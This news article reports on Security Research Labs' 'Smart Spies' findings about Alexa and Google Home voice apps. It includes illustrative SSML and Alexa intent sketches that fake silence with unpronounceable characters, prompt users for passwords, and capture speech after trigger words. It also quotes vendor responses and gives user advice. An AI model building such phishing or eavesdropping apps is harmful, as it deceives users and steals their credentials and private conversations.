It’s no secret that smart speakers are listening in on you despite the excuses that manufacturers make. But while you may have thought it was just Google and Amazon listening in, security researchers have found Alexa and Google Assistant speakers can be manipulated by hackers to eavesdrop and phish for your passwords.
The vulnerability—dubbed Smart Spies—was discovered by Security Research Labs, a German hacking research collective and think tank. To phish for passwords, the group found that a hacker could add a long pause by making the app “say” an unpronounceable character sequence: “�.” That means a hacker could easily create an app, open it with an error message (e.g., “This skill is not available in your country”), add a pause to make you think it’s stopped listening, and then prompt you to “update” by stating your password, email, or other identifying information. You can see a video demo of how that would work below. (There’s also a video for Google.)
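The fake silence comes from the text-to-speech markup (SSML) that voice apps use to shape their spoken responses. Here’s a rough, illustrative sketch of what such a malicious response could look like—the exact payload and wording aren’t published here, so the repeated unpronounceable sequence and the phrasing below are stand-ins, not the researchers’ actual code:

```xml
<speak>
  This skill is not available in your country.
  <!-- The speech engine can't pronounce this character sequence, so it
       outputs silence; chaining copies of it fakes a long pause without
       using the platform's explicit (and duration-limited) break tags. -->
  �. �. �. �. �.
  An important security update is available for your device.
  To install it, please say "start update" followed by your password.
</speak>
```

The “�” here is a replacement character standing in for code points the speech engine can’t render—which is exactly why the device goes quiet while the microphone stays hot.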
To eavesdrop, hackers can use that same unpronounceable character sequence to trick a user into thinking the device has stopped listening—and then keep recording conversations, which get transcribed and sent to a hacker’s server. The exploit works on both Amazon and Google devices. That said, it’s even more terrifying on the Google Home, because unlike Amazon Alexa devices, Google Home does not require hackers to specify trigger words to start recording. Theoretically, that means a hacker could manipulate a Google Home device into an infinite loop: so long as you say something within a 30-second window, the device will keep recording your conversation, as shown in the video below. (Here’s the same for Alexa.)
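On Alexa, where trigger words are required, the eavesdropping side of the trick hinges on an intent that matches common words and scoops up everything said after them into a wide-open slot. A hedged sketch of what such an interaction-model fragment might look like—the intent name, slot name, and sample phrases below are invented for illustration:

```json
{
  "intents": [
    {
      "name": "CaptureSpeechIntent",
      "slots": [
        { "name": "spokenText", "type": "AMAZON.SearchQuery" }
      ],
      "samples": [
        "email {spokenText}",
        "password {spokenText}",
        "address {spokenText}"
      ]
    }
  ]
}
```

Anything the user says after one of those everyday trigger words lands in the `spokenText` slot as transcribed text, which the skill’s backend can then quietly forward to a server of the attacker’s choosing.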
Part of the problem lies with the approval process for smart speaker apps—or Skills, as they’re called for Alexa, and Actions for Google Home. As on your smartphone, third-party developers can create whatever apps they want, and after an approval process, they get added to a store for download. The thing is, neither Google nor Amazon reviews subsequent updates once an app has been approved. That means once a bad actor gets an initially innocuous app approved, they can go back and add some fishy nonsense without being detected. (That’s exactly what Security Research Labs did to create its phishing and eavesdropping apps.)
In an email, Security Research Labs told Gizmodo that it had discovered the vulnerability in February of this year. “We were surprised to see the Smart Spies hacks still worked more than three months after reporting the issues to Google and Amazon.” In its blog post, the group noted that voice app reviews need to explicitly search for unpronounceable characters, silent SSML messages, and suspicious output texts like “passwords.”
“Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified,” an Amazon spokesperson told Gizmodo. “It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password.”
Google had a similar response. “All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies,” a spokesperson told Gizmodo via email. “We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.”
In general, it’s a good reminder to be incredibly wary of any smart speaker asking for your password. Amazon and Google will never ask you for it. And in the case of certain Alexa devices, it’s helpful to check for the blue ring that indicates when the device is listening. In Security Research Labs’ demos, you can see the blue ring is still active even when the app is pretending to be silent. (That said, it can be hard to notice when you’re busy doing other things like running around the kitchen or folding laundry.) And, under the worst conditions, unplug the bastards. Better yet, if you can avoid it, don’t bring these dystopian nightmares into your home.